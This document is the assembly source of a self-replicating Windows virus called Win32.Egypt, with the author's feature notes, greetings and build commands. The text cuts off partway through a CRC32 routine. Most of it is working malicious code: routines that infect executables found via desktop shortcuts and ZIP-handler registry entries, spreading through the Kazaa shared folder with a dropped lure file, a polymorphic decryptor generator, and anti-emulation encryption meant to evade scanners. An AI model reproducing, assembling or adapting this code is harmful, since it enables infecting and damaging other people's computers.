;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
;
;
;
;                (Ermm...I'd higly appreciate if someone would take the pain
;                 of drawing a sphynx or a couple of pyramids here, because,
;                 as you can see, not only my asm skills suck...)
;
;
;
;
;
;
;                                Win32.Egypt
;
;                                ~~~~~~~~~~~
;
;                                          @2005 TOE-VX
;                                          ~~~~~~~~~~~~
;
;
;
;
;
;
;=============================================================================
;  DISCLAIMER : 
;  ~~~~~~~~~~    This is the source of a VIRUS, The author is not
;                responsible for any damage that may occur due to
;                the assembly of this file. Use it at your own risk.
;
;=============================================================================
;
;
;
; * Targets : PE EXE Files.
;
; * Residence : Per Process Resident.
;
; * Hooked APIs : None.
;
; * Infection method : Every 8 seconds it will scan for directory change
;                      and infects all files in new directory
;                      this is a very efficient method to retrieve files. 
;                      The virus will also search for all exe files pointed
;                      to by link files in the desktop and infect them.
;                      Also the virus will infect all applications used
;                      to open ZIP files. EXE files are infected by the
;                      classical method of adding the viral body to the
;                      section in the file.
;
; * EPO : None.
;
; * Polymorphism : Yes, The virus is polymorphic using its own engine.
;                  The virus uses slow polymorphism, utilizing a single
;                  decryptor for all files infected in the current run
;                  of the infected process. The polymorphic engine utilizes
;                  random registers, constructs calls to subroutines and
;                  also features conditional and unconditional jumps with
;                  non zero displacements. Yet it only utilizes a 32 bit
;                  xor operation. Although i coded this engine from scratch,
;                  i would like to thank GriYo, since i started writing
;                  "real" polymorphic engines only after i examined his
;                  1996 Dos virus Implant.
;
; * Encryption : Yes, the virus is encrypted twice , the first decryptor
;                is that generated by the polymorphic engine and the other
;                decryptor is a fixed one with anti emulation trick.
;                The encryption algorithm is just meant to be effective
;                against scanners, not a one you would say much about.
;
; * Worming : Yes, the virus will infect all executables at the kazza
;             shared folder, thus being able to pass to other PCs and
;             thus exhibiting P2P worming, It will also create an
;             executable file there and infect it, the executable
;             file has a really attractive name ;) and a facked
;             message in case the user runs it.
;
; * Misc : Reserves file attributes and time, Marks infected files
;          Uses SEH to stabilize infected files
;          Avoids infecting AVs as it will not infect files
;          having AV,AN,DR,ID,OD,TB,F- in their names
;          Avoids Infecting system files and avoids infecting
;          DLLs misnamed as EXEs also doesn't infect compressed files
;          Those extra checks give the virus very good performance
;          and reduce error and corruption chances. 
;
; * Payload : 1. On egyptian PCs it will display a funny message
;             the message is randomly chosen from twenty messages
;             the message will appear whenever an infected file
;             is executed with a one over twenty five probability.
;             I have included the english translations in the source
;             in case somebody is interested.
;
;             2. On non-egyptian PCs it will change IE default homepage
;             to the egyptain ministry of tourism webpage
;             http://www.Touregypt.net, This will take place on the
;             first and third friday of every month.
; 
;
;=============================================================================
;
; Version History:
;=================
;
; 25-7-2005 version 1.0 finished
;
; 26-7-2005 Kaspersky detects version 1.0 , that's a really good job guys 
; keep it up ;) and as usual they misname the virus as "Gypet" which rather
; sounds like a porn film title !!  *^_^* 
;
; 27-7-2005 version 1.2 that is a version 1.0 with slight code changes and
; comments
;
; 29-7-2005 I upgraded the virus to version 1.5 by adding a polymorphic
; engine.
;
;=============================================================================
;
; Things to be done in ver 2.0:
;==============================
;
; 1- New anti emulation tricks
; 2- ZIP infection
; 3- More worming strategies
; 4- SFC file protection awareness
; 5- EPO
; 6- Terminate AVers processes
;
;=============================================================================
;
; Greetings :
; ~~~~~~~~~~~
; Although almost everyone i will be greeting here has already quit writing
; viruses since a very long time now, i would still like to express my
; gratitude to them all.
;
; Nowhere Man : Everybody knows that VCL produced only lame viruses, yet its
; commented sources were excellent to teach me assembly in a stupid country
; lacking any books dedicated to assembly.
;
; Dark Angel : For presenting me to "real" Dos viruses.
;
; Neurobasher and vyvojar : For writing some of the best Dos viruses ever.
;
; 29A : For editing a really good virus magazine.
;
; Lord Julus : For being very friendly with me in our few email exchanges
; and for writing very friendly and useful articles. ( I like Rammstein too ;)
;
; The Mental Driller : For being THE most ethical virus writter ever as well
; as for writing some of the most complicated viruses ever.
;
; Zombie : For writing Mistfall.
; 
; And greetings for all the other virus writers who exhibit ethical and
; friendly attitude and for those who write advanced and complicated research
; viruses.
; 
;=============================================================================
;
; * To Assemble :
; ~~~~~~~~~~~~~~~
; tasm32 -ml -m5 -q -zn egypt.asm
; tlink32 -Tpe -c -x -aa egypt,,, import32
; pewrsec egypt.exe    
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


.386p
.model flat
JUMPS
cmp_            macro   reg,joff1              
                inc     reg                    
                jz      joff1                  
                dec     reg                    
                endm                           

apicall         macro   apioff                 
                call    dword ptr [ebp+apioff]
                endm

                .data
mark            equ     04Ch

section_flags   equ     00000020h or 20000000h or 80000000h
code_len                        equ     code_end - code_start
L                               equ     <LARGE>
GENERIC_READ                    equ     80000000h
GENERIC_WRITE                   equ     40000000h
GENERIC_READ_WRITE              equ     GENERIC_READ or GENERIC_WRITE
OPEN_EXISTING                   equ     00000003h
PAGE_READWRITE                  equ     00000004h
PAGE_WRITECOPY                  equ     00000008h
FILE_MAP_WRITE                  equ     00000002h
FILE_SHARE_READ                 equ     00000001h
FILE_ATTRIBUTE_NORMAL           equ     00000080h
FILE_ATTRIBUTE_DIRECTORY        equ     00000010h
FILE_BEGIN                      equ     00000000h
HKEY_CURRENT_USER               equ     80000001h
KEY_SET_VALUE                   equ     00000002h
REG_SZ                          equ     00000001h
SPI_SETDESKWALLPAPER            equ     00000020
CREATE_ALWAYS                   equ     00000002h
MB_ICONEXCLAMATION              equ     00000030h

; Only hardcoded for 1st generation

kernel_         equ     0BFF70000h
kernel_wNT      equ     077F00000h
shit_size equ delta-code_start

FILETIME struc
        dwLowDateTime   dd      ?
        dwHighDateTime  dd      ?
FILETIME ends

WIN32_FIND_DATA struc
        dwFileAttributes        dd              ?
        ftCreationTime          FILETIME        ?
        ftLastAccessTime        FILETIME        ?
        ftLastWriteTime         FILETIME        ?
        nFileSizeHigh           dd              ?
        nFileSizeLow            dd              ?
        dwReserved0             dd              ?
        dwReserved1             dd              ?
        cFileName               db      260     dup     (?)
        cAlternateFileName      db      14      dup     (?)
WIN32_FIND_DATA ends

SYSTEMTIME struc
        wYear           dw      ?
        wMonth          dw      ?
        wDayOfWeek      dw      ?
        wDay            dw      ?
        wHour           dw      ?
        wMinute         dw      ?
        wSecond         dw      ?
        wMilliseconds   dw      ?
SYSTEMTIME ends

; Functions imported by Generation-1 -
extrn           ExitProcess:PROC
extrn           GetModuleHandleA:PROC
extrn           MessageBoxA:PROC

; Some dummy data for Generation-1 - 
.data
dummy   dd      0

;----------------------------------------------------------------------------
; CODE -
;----------------------------------------------------------------------------
.code
code_start:
        call    poly_dec
poly_enc:
        popfd
        popad
        pushad
        pushfd

        call    decrypt
enc:

        call    delta_                          
delta:  db      "Win32.Egypt v 1.5",0
        db      "(c) 2005 TOE-VX. Dedicated to my friends RNT and TRT.",0
        db      "A Big F#@! you to all the terrorists who commited"
        db      " the sharm massacre."
delta_: pop     ebp
        mov     eax,ebp
        sub     ebp,offset delta

        sub     eax,shit_size      
        sub     eax,00001000h      
NewEIP  equ     $-4
        mov     dword ptr [ebp+module_base],eax     

; Constructing SEH will allow the virus to run smoothly and stabilize
; infected files against crashes.

        call    ChangeSEH          
        mov     esp,[esp+08h]
        jmp     RestoreSEH
ChangeSEH:
        xor     ebx,ebx
        push    dword ptr fs:[ebx]
        mov     fs:[ebx],esp              

; Now we will get kernel 32 address
        mov     esi,[esp+2Ch]                 
        and     esi,0FFFF0000h                
        mov     ecx,5
        call    GetK32

        mov     dword ptr [ebp+kernel],eax    

; Now get the APIs
        lea     esi,[ebp+@@NamezCRC32]
        lea     edi,[ebp+@@Offsetz]
        call    GetAPIs                 

; Initialize random number generator
        call    irandom32

; Generate a polymorphic decryptor
        call    Poly
        jc      RestoreSEH

; Infect all applications used to deal with ZIP files and infect the
; Kazza shared folder, if any.
        mov     eax,[ori_eip+ebp]
        mov     [tmp_eip+ebp],eax
        call    infectzippers
        mov     eax,[tmp_eip+ebp]
        mov     [ori_eip+ebp],eax     

; Infect all the files pointed to by links on the desktop
        mov     eax,[ori_eip+ebp]
        mov     [tmp_eip+ebp],eax
        call    infectlinks
        mov     eax,[tmp_eip+ebp]
        mov     [ori_eip+ebp],eax     


; Launch a thread that will detect directory changes and infect files
; in new directories
        call    LaunchVirusMainThread

; Get the Message box API address, if we fail we will skip the payload
        mov     eax,offset u32_string   
        add     eax,ebp                 
        call    VxGetModuleHandle       
        or      eax,eax        
        je      RestoreSEH                    
        mov     [user32+ebp],eax        

        mov     edx,offset msgbox_string
        add     edx,ebp                 
        mov     eax,[user32+ebp]        
        call    VxGetProcAddress        
        or      eax,eax    
        je      RestoreSEH  
        mov     [_MessageBoxA+ebp],eax

; Check if we should make a payload or not and do it if necessary
        call    payload              ;N.B. payload must be after zip infection
                                        ;as adavapi dll must be loaded
; Restore SEH and jump back to host
RestoreSEH:
        xor     ebx,ebx
        pop     dword ptr fs:[ebx]
        pop     eax

        popfd
        popad

        mov     ebx,12345678h
        org     $-4
ori_eip                 dd      offset g1_quit - 400000h

        add     ebx,12345678h
        org     $-4
module_base dd      00400000h

        push    ebx
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                        ; P  O  L  Y  E  N  G  I  N  E

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Poly:
        push    00000040h
        push    00001000h OR 00002000h
        push    00001000h
        push    0h
        call    dword ptr [_VirtualAlloc+ebp]
        or      eax,eax
        jne     contpoly
        stc
        ret

        decplace dd 0h
        dec_len dd 0h
        viruslen dd 0h
        keyy db 00h, 00h, 00h, 00h
contpoly:
        mov dword ptr [ebp+decplace],eax
        push eax
        pop edi
; now edi points to place to put decryptor
; we want to generate a decryptor that looks like this :
;       pop     reg1
;       push    reg1
;       xor     reg2,reg2
;       mov     reg3,key
;dec_loop:
;       xor     dword ptr [reg1],reg3
;       add     reg1,4h
;       inc     reg2
;       cmp     reg2,((decrypt-enc)/4)+1
;       jne     dec_loop
;       ret

no_reg1_ebp:
call getfreg                                         ;gen pop reg1
cmp al,5
je no_reg1_ebp

mov byte ptr [ebp+regs],al
mov al,byte ptr[pops+eax+ebp]
stosb
mov ax,09c60h                                        ;gen pushad&pushfd
stosw

mov dword ptr [ebp+regs+1],0

call garble

xor eax,eax
mov al,byte ptr[ebp+regs]
mov al,byte ptr[pushs+eax+ebp]
stosb
call garble

xor eax,eax                                          ;gen xor/sub reg2,reg2   
mov al,06h
call rndeax
cmp al,3h
jbe @xor
mov al,02bh
jmp @skipxor
@xor:
mov al,033h                                     
@skipxor:
stosb
xor eax,eax
call getfreg
mov byte ptr [ebp+regs+1],al
mov bl,al
push ecx
mov     cl,3
shl     al,cl
pop ecx
add al,0c0h 
add al,bl
stosb
call garble

call getfreg                                              ;gen mov reg3,key
mov byte ptr [ebp+regs+2],al
add al,0b8h
stosb
call random32
mov word ptr[ebp+keyy],ax
stosw
call random32
mov word ptr[ebp+keyy+2],ax
stosw
call garble

mov dword ptr[ebp+loopplace],edi                           ; we will be loping
                                                           ; here
call garble
mov al,31h                                                 ; gen xor[reg],reg
stosb
xor eax,eax
mov al,byte ptr [ebp+regs+2]
push ecx
mov cl,3
shl al,cl
pop ecx
mov ebx,eax
xor eax,eax
mov al,byte ptr [ebp+regs]
add eax,ebx
stosb
call garble

mov al,083h                                              ;gen add reg1,4
stosb
xor eax,eax
mov al,byte ptr [ebp+regs]
add ax,04c0h
stosw
call garble

xor eax,eax
mov al,byte ptr [ebp+regs+1]
add al,40h
stosb
call garble

xor eax,eax
mov al,byte ptr [ebp+regs+1]
cmp al,0
jne @nf_eax
mov al,3dh
stosb
jmp @conttt

@nf_eax:
xchg al,ah
mov al,81h
stosb
xchg al,ah
add al, 0f8h
stosb
@conttt:

mov eax,((poly_end-poly_enc)/4)+1
stosw
xor eax,eax
stosw
mov ax,0574h
stosw
mov al,0e9h
stosb
mov eax,dword ptr[ebp+loopplace]
sub eax,edi
sub eax,4h ; ??
mov dword ptr[edi],eax
inc edi
inc edi
inc edi
inc edi

               
call garble
mov al,0c3h  ;return
stosb
call garble

        mov ecx,edi
        sub ecx, dword ptr [ebp+decplace]
        mov dword ptr [ebp+dec_len],ecx
        mov dword ptr [ebp+viruslen],code_len
        add dword ptr [ebp+viruslen],ecx
        clc
        ret


pushs:
push eax
push ecx
push edx
push ebx
push esp ;won't be used , naturally
push ebp
push esi
push edi
end_pushs:

pops:
pop eax
pop ecx
pop edx
pop ebx
pop esp
pop ebp
pop esi
pop edi
end_pops:

garble:
        mov     eax,((offset choices_end-choices)/4)
        call    rndeax
        shl     eax,2
        add     eax,ebp
        add     eax,offset choices
        mov     eax,[eax]
        add     eax,ebp
        call    eax
        ret

choices:
dd offset garblock
dd offset pushpop
dd offset abs_jmp
dd offset backcall
dd offset cond_jmp
dd offset cond_shit
choices_end:

jmplocation dd 0h
calllocation dd 0h

cond_jmp:
xor eax,eax
mov al,10h
call rndeax
add al,070h
stosb
stosb
mov dword ptr [ebp+jmplocation],edi
call garblock

mov eax,dword ptr [ebp+jmplocation]
sub eax,edi

push edi
mov edi,dword ptr [ebp+jmplocation]
dec edi
neg al
stosb
pop edi

ret


backcall:
mov al,0ebh
stosb
stosb
mov dword ptr [ebp+jmplocation],edi
call abs_shit
mov dword ptr [ebp+calllocation],edi
call garblock
mov al,0c3h
stosb
call abs_shit

mov eax,dword ptr [ebp+jmplocation]
sub eax,edi

push edi
mov edi,dword ptr [ebp+jmplocation]
dec edi
neg al
stosb
pop edi

mov al,0e8h
stosb
mov eax,(0ffffh -3h)
sub eax,edi
add eax,dword ptr [ebp+calllocation]
stosw
mov ax,0ffffh
stosw

ret


cond_shit:
xor eax,eax
mov al,80h
call rndeax
cmp al,40h
je stc_
mov ax,073f8h
stosw
call abs_shit
ret
stc_:
mov ax,072f9h
stosw
call abs_shit
ret


abs_jmp:
mov al,0ebh
stosb
call abs_shit
ret

abs_shit:
mov eax,20h
call rndeax
stosb
mov ecx,eax
shitloop:
push ecx
call random32
pop ecx
stosb
loop shitloop
ret

pushpop:
call getreg
add eax,ebp
add eax,offset pushs
mov al,byte ptr [eax]
stosb
call garblock
call getfreg
add eax,ebp
add eax,offset pops
mov al,byte ptr [eax]
stosb
ret

garblock:
xor eax,eax
mov al,7h
call rndeax
add al,3
mov ecx,eax
loph:
push ecx
call garbage
pop ecx
loop loph
ret

garbage:
xor eax,eax
mov al,100
call rndeax
cmp al,30     ;30% reg imm
jbe regimm
cmp al,40     ;10% rem mem
jbe regmem
cmp al,50     ;10% one byte  
jbe onebyte
jmp regreg    ;50% reg reg

onebyte:
mov eax,offset one_end-one
call rndeax
mov ebx,eax
add ebx,ebp
add ebx,offset one
mov al,byte ptr [ebx]
stosb
ret

regmem:
mov eax,offset (etwobitinstrs- twobitinstrs)
call rndeax
mov ecx,offset  twobitinstrs
add ecx,eax
mov al,byte ptr [ecx+ebp]
or al,al
je regmem
stosb

call getfreg
mov ecx,3
shl al,cl

mov ebx,eax
mov al,08h
mov al,byte ptr [ebp+regs]
add eax,ebx
stosb
ret

regimm:
;generate op reg,imm  (eax not included)
mov al,81h
stosb
mov al,8
call rndeax
push ecx ;we now need to make *8
xor ecx,ecx
mov cl,3
shl al,cl
pop ecx
add al,0c1h
mov ebx,eax
call getfreg
dec eax ;coz eax has no opcode
add eax,ebx

stosb
call random32
stosw
call random32
stosw
ret


regreg:
;generate op reg,reg
mov eax, offset (etwobitinstrs- twobitinstrs)
call rndeax
xor ebx,ebx
mov bl,al
add ebx,offset  twobitinstrs
add ebx,ebp
mov al,byte ptr [ebx]
or al,al
je regreg               
stosb
call getfreg       
push ecx
mov     cl,3
shl     al,cl
pop ecx
mov ebx,eax
add bl,0c0h 
call getfreg
add bl,al
xchg eax,ebx
stosb
ret

getfreg: ;get free reg
xor eax,eax
f_esp:
mov al,8
call rndeax
cmp al,4
je f_esp
cmp byte ptr[ebp+regs],al
je f_esp
cmp byte ptr[ebp+regs+1],al
je f_esp
cmp byte ptr[ebp+regs+2],al
je f_esp
ret
getreg:
xor eax,eax
mov al,8
call rndeax
ret

loopplace dd 0h
fromhere dd 0h
regs:
db 0 
db 0 
db 0 

twobitinstrs:
db 23h  ;and
db 3bh  ;cmp
db 0bh  ;or
db 8bh  ;mov
db 33h  ;xor
db 03h  ;add
db 2bh  ;sub
etwobitinstrs:

one:
NOP
CLC
STC
one_end:

; POLY ENGINE ENDS HERE


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all files pointed to by links on the desktop
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectlinks:
        mov     edi,ebp
        add     edi,offset olddir
        mov     al,0
        mov     ecx,128
        rep     stosb
        push    ebp
        push    L 128
        mov     eax,ebp
        add     eax,offset olddir
        push    eax        
        call    [_GetWindowsDirectoryA+ebp]
        pop     ebp                     

        mov     edi,ebp
        add     edi,offset olddir
        add     edi,eax
        mov     esi,ebp
        add     esi,offset desktop
        mov     ecx,9
        rep     movsb

        push    ebp
        mov     eax,ebp
        add     eax,offset currdir
        push    eax        
        push    L 128
        call    [_GetCurrentDirectoryA+ebp]
        pop     ebp                     
        
        mov     edx,ebp
        add     edx,offset olddir
        push    edx
        call    [ebp+_SetCurrentDirectoryA]

        call    searchlinks  

        mov     edx,ebp
        add     edx,offset currdir
        push    edx
        call    [ebp+_SetCurrentDirectoryA]
        ret

searchlinks:
        push    ebp                    
        mov     eax,offset wfd         
        add     eax,ebp                
        push    eax                    
        mov     eax,offset lnk_match   
        add     eax,ebp                
        push    eax                    
        call    [_FindFirstFileA+ebp]
        pop     ebp                  

        inc     eax
        or      eax,eax
        je      icd_end2
        dec     eax
        mov     [search_handle2+ebp],eax 

        mov     edx,offset wfd.cFileName
        add     edx,ebp                 
        call    infectlink              
fnf_loop2:
        mov     edx,ebp
        add     edx,offset olddir
        push    edx
        call    [ebp+_SetCurrentDirectoryA]

        push    ebp
        mov     eax,offset wfd   
        add     eax,ebp          
        push    eax              
        push    [search_handle2+ebp] 
        call    [_FindNextFileA+ebp]
        pop     ebp                  
        cmp     eax,0                
        je      icd_end2             
        mov     edx,offset wfd.cFileName
        add     edx,ebp                 
        call    infectlink              
        jmp     fnf_loop2               
icd_end2:
        push    [search_handle2+ebp]     
        call    [ebp+_FindClose]
        ret

infectlink:

        push     0                                      
        push     0                                      
        push     OPEN_EXISTING                          
        push     0                                      
        push     0                                      
        push     GENERIC_READ+GENERIC_WRITE
        push     edx                                   
        call     [ebp+_CreateFileA]
        mov      [ebp+hfile2], eax                        
                                                    
        push     0                                      
        push     eax                                    
        call     [ebp+_GetFileSize]
        push     eax
     
        push     0                                      
        push     eax
        push     0                                      
        push     PAGE_READWRITE                         
        push     0                                      
        push     [ebp+hfile2]                            
        call     [ebp+_CreateFileMappingA]

        mov      [ebp+hmap2], eax                         

        pop      eax
        push     eax                                            
        push     eax
     
        push     0                                      
        push     0                                      
        push     2                                   ;FILE_MAP_ALL_ACCESS                    
        push     [ebp+hmap2]                             
        call     [ebp+_MapViewOfFile]
                                                   
        mov      [ebp+haddress2], eax                     
        pop      ebx ; length
        push     eax
        pop      edx
        add      ebx,edx
scashit:
        inc      edx
        cmp      edx,ebx
        jae      invalidlnk

        cmp      word ptr [edx], "\:"
        jne      scashit
scashit2:
        inc      edx
        cmp      edx,ebx
        jae      invalidlnk

        cmp      word ptr [edx], "\:"
        jne      scashit2
        dec      edx

        call     InfectFile
invalidlnk:
        push     [ebp+haddress2]                         
        call     [ebp+_UnmapViewOfFile]                 
                                                   
        push     [ebp+hmap2]                             
        call     [ebp+_CloseHandle]                     
                                                  
        push     [ebp+hfile2]                            
        call     [ebp+_CloseHandle]                     

        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all Applications that are used to open ZIPs
; and drop the file on kazaa's shared folder, if any
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectzippers:                              
                                            
        pushad
        mov      eax,offset a32_string   
        add      eax,ebp                 
        call     VxGetModuleHandle       
        or       eax,eax                 
        je       @@@End                  
        mov      [advapi32+ebp],eax      

        mov      edx,offset regopen_string
        add      edx,ebp                 
        mov      eax,[advapi32+ebp]      
        call     VxGetProcAddress        
        or       eax,eax                 
        je       @@@End                  
        mov      [_RegOpenKeyExA+ebp],eax

        mov      edx,offset regget_string
        add      edx,ebp                 
        mov      eax,[advapi32+ebp]      
        call     VxGetProcAddress        
        or       eax,eax
        je       @@@End                  
        mov      [_RegQueryValueExA+ebp],eax

        mov      edx,offset Regset
        add      edx,ebp          
        mov      eax,[advapi32+ebp]   
        call     VxGetProcAddress     
        or       eax,eax
        je       @@@End               
        mov      [_RegSetValueExA+ebp],eax
                 
        mov      edx,offset close_string
        add      edx,ebp                
        mov      eax,[advapi32+ebp]     
        call     VxGetProcAddress       
        or       eax,eax
        je       @@@End                 
        mov      [_RegCloseKey+ebp],eax 


player_loop:
        mov     eax,offset HandleOpenedKey
        add     eax,ebp
        push    eax
        push    000F003Fh                                    ;KEY_ALL_ACCESS
        push    0
        call    pushstring
        db      "Software\Microsoft\Windows\CurrentVersion\Explorer\"
        db      "FileExts\.zip\OpenWithList",0
pushstring:
        push    80000001h                                  ;HKEY_CURRENT_USER
        call    [ebp+ _RegOpenKeyExA]
        or      eax, eax  
        jnz     @@End     

        call    clean_buff
        mov     eax,offset buff_
        add     eax,ebp
        push    eax
        mov     eax, offset buff
        add     eax,ebp
        push    eax
        push    0
        push    0
        call    pushvalue
player  db      "a",0
pushvalue:
        push    dword ptr [ebp+HandleOpenedKey]
        call    [ebp+_RegQueryValueExA]

        push    dword ptr [ebp+ HandleOpenedKey]
        call    [ebp+_RegCloseKey] ; Close key handle

        mov     esi,offset buff
        mov     edi,offset prog_buffer
        add     esi,ebp
        add     edi,ebp
next_copy:
        lodsb
        cmp     al,0
        je      copy_done
        stosb
        jmp     next_copy
copy_done:
        mov     esi,offset part2
        add     esi,ebp
        mov     ecx,part2_len
        rep     movsb

        mov     eax, offset HandleOpenedKey
        add     eax,ebp
        push    eax
        push    000F003Fh                                  ;KEY_ALL_ACCESS
        push    0
        mov     eax, offset prog_itself
        add     eax,ebp
        push    eax
        push    80000000h                                ;HKEY_CLASSES_ROOT
        call    [ebp+_RegOpenKeyExA]

        or      eax, eax 
        jnz     @@End      

        call    clean_buff
        mov     eax, offset buff_
        add     eax,ebp
        push    eax
        mov     eax, offset buff
        add     eax,ebp
        push    eax
        push    0
        push    0
        push    0                                          ;Default value         
        push    dword ptr [ebp+HandleOpenedKey]
        call    [ebp+_RegQueryValueExA]

        push    dword ptr [ebp+HandleOpenedKey]
        call    [ebp+ _RegCloseKey] 
        mov     esi,ebp
        add     esi,offset buff
        push    esi
loopsearch:
        cmp     dword ptr [esi],"exe."
        je      reached
        cmp     dword ptr [esi],"EXE."
        je      reached
        inc     esi
        jmp     loopsearch
reached:
        add     esi,4
        push    esi
        pop     edi
        mov     al,0
        stosb

        pop     esi
first_loop:
        mov     ax,word ptr [esi+1]
        cmp     ax, "\:"
        je      skip_dec
        inc     esi
        jmp     first_loop
skip_dec:
        mov     edx,esi
        call    InfectFile

        inc     byte ptr [ebp+player]  
        jmp     player_loop
@@End:
        mov     byte ptr [ebp+player],"a"
        mov     eax,offset HandleOpenedKey
        add     eax,ebp
        push    eax
        push    000F003Fh                           ;KEY_ALL_ACCESS
        push    0
        call    pushstring2
        db      "SOFTWARE\KAZAA\LocalContent",0
pushstring2:
        push    80000002h                          ;HKEY_CURRENT_USER
        call    [ebp+ _RegOpenKeyExA]
        or      eax, eax 
        jnz     @@@End      

        call    clean_buff
        mov     eax,offset buff_
        add     eax,ebp
        push    eax
        mov     eax, offset buff
        add     eax,ebp
        push    eax
        push    0
        push    0
        call    pushvalue2
        db      "DownloadDir",0
pushvalue2:
        push    dword ptr [ebp+HandleOpenedKey]
        call    [ebp+_RegQueryValueExA]

        push    dword ptr [ebp+ HandleOpenedKey]
        call    [ebp+_RegCloseKey] 
        push    ebp                     
        mov     eax,ebp
        add     eax,offset currdir
        push    eax        
        push    L 128
        call    [_GetCurrentDirectoryA+ebp]
        pop     ebp                     

        mov     edx,ebp
        add     edx,offset buff
        push    edx
        call    [ebp+_SetCurrentDirectoryA]

        call    InfectCurrentDirectory
        call    dropfile

        mov     edx,ebp
        add     edx,offset currdir
        push    edx
        call    [ebp+_SetCurrentDirectoryA]
@@@End:
        popad
        ret

clean_buff:
        pushad
        mov     edi,offset buff_
        add     edi,ebp
        mov     dword ptr [edi],030h
        add     edi,4
        mov     ecx,30h
        mov     al,0
        rep     stosb
        popad
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Drop a file in kazza's shared folder
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

dropfile:
        mov      edx,ebp
        add      edx,offset fileee
        push     edx
        call     [ebp+_GetFileAttributesA]
        inc      eax
        or       eax,eax
        je       makeit
        ret
makeit:
        push     0
        push     0                                      
        push     1                                      ; Create new
        push     0                                      
        push     0                                      
        push     GENERIC_READ+GENERIC_WRITE             
        mov      edx,ebp
        add      edx,offset fileee
        push     edx
        call     [ebp+_CreateFileA]                     
        mov      [ebp+hfile],eax
                           
        push     0                                      
        mov      eax,4096     ;note that the filesize is hardcoded
        push     eax
        push     0             
        push     PAGE_READWRITE
        push     0                 
        push     [ebp+hfile]       
        call     [ebp+_CreateFileMappingA]    
      
        mov      [ebp+hmap], eax               
       
        mov      eax,4096
        push     eax
        push     0                            
        push     0                                      
        push     2                                     ;FILE_MAP_ALL_ACCESS                    
        push     [ebp+hmap]                             
        call     [ebp+_MapViewOfFile]                   
        
        mov      [ebp+haddress], eax                     
   
        mov      edi,eax
        mov      esi,ebp
        add      esi, offset dropstart
        mov      ecx,dropend-dropstart
nextat:                                    ; Decompress compressed dropper
        lodsb                              ; file, i would like to thank
        or       al,al                     ; Vecna for simple decompressor
        jnz      nextbit
        dec      ecx
        dec      ecx
        push     ecx
        lodsw
        xor      ecx,ecx
        mov      cx,ax
        mov      al,0
        rep      stosb
        pop      ecx
        loop     nextat
        jcxz     quitta
nextbit:
        stosb
        loop     nextat
quitta:
        push     [ebp+haddress]                         
        call     [ebp+_UnmapViewOfFile]                 
                                                   
        push     [ebp+hmap]                             
        call     [ebp+_CloseHandle]                     
                                                   
        push     [ebp+hfile]                            
        call     [ebp+_CloseHandle]                     
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Get Kernel32 address, thanks billy !
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

GetK32:
_@1:    jecxz   WeFailed
        mov     cx,word ptr [esi]
        xor     cx,"4k"
        cmp     cx,"ZM"xor "4k"
        jz      CheckPE
_@2:    sub     esi,10000h
        dec     ecx
        jmp     _@1
CheckPE:
        mov     edi,[esi+3Ch]
        add     edi,esi
        mov     cx,word ptr [edi] 
        xor     cx,"3a"
        cmp     cx,"EP"xor "3a"
        jz      WeGotK32
        jmp     _@2
WeFailed:
        mov     ecx,cs
        xor     cl,cl
        jecxz   WeAreInWNT
        mov     esi,kernel_
        jmp     WeGotK32
WeAreInWNT:
        mov     esi,kernel_wNT
WeGotK32:
        xchg    eax,esi
        ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Get APIs , also thanks billy !
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

GetAPIs:
@@1:    lodsd 
        push    esi
        push    edi
        call    GetAPI_ET_CRC32
        pop     edi
        pop     esi
        stosd  
        cmp     byte ptr [esi],0BBh             ; Last API?
        jz      @@4                
        jmp     @@1                           
@@4:    ret

GetAPI_ET_CRC32:
        xor     edx,edx
        xchg    eax,edx                       
        mov     word ptr [ebp+Counter],ax     
        mov     esi,3Ch
        add     esi,[ebp+kernel]              
        lodsw
        add     eax,[ebp+kernel]              

        mov     esi,[eax+78h]                 
        add     esi,1Ch                       
        add     esi,[ebp+kernel]

        lea     edi,[ebp+AddressTableVA]      
        lodsd                                 
        add     eax,[ebp+kernel]              
        stosd                                 

        lodsd                                 
        add     eax,[ebp+kernel]              
        push    eax                           
        stosd                                 

        lodsd                                 
        add     eax,[ebp+kernel]              
        stosd                                 

        pop     esi                           

@?_3:   push    esi                           
        lodsd                                 
        add     eax,[ebp+kernel]              
        xchg    edi,eax                       
        mov     ebx,edi                       

        push    edi                            
        xor     al,al                          
        scasb                                  
        jnz     $-1                          
        pop     esi                          

        sub     edi,ebx                         

        push    edx                  
        call    CRC32                        
        pop     edx                         
        cmp     edx,eax                       
        jz      @?_4                           

        pop     esi                           
        add     esi,4                         
        inc     word ptr [ebp+Counter]       
        jmp     @?_3                          
@?_4:
        pop     esi                            
        movzx   eax,word ptr [ebp+Counter]      
        shl     eax,1                          
        add     eax,dword ptr [ebp+OrdinalTableVA] 
        xor     esi,esi                         
        xchg    eax,esi                        
        lodsw                              
        shl     eax,2                           
        add     eax,dword ptr [ebp+AddressTableVA]
        xchg    esi,eax                       
        lodsd                                
        add     eax,[ebp+kernel]              
        ret

CRC32:
        cld
        xor     ecx,ecx                
        dec     ecx                    
        mov     edx,ecx
NextByteCRC:
        xor     eax,eax
        xor     ebx,ebx
